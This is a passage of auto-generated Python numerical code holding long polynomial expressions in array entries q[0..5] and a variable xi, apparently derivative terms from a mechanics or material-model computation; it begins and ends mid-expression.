2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0])*(-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 320703916.631818*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 10147272.3621786*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 199774.424630392*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 
0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) - 8.88888888888889*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 
0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1), (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - 
q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 
0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0])*(-160351958.315909*xi**10*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 
1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 
1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1), (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] 
+ q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) + 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0])*(-160351958.315909*xi**10*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 
160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 
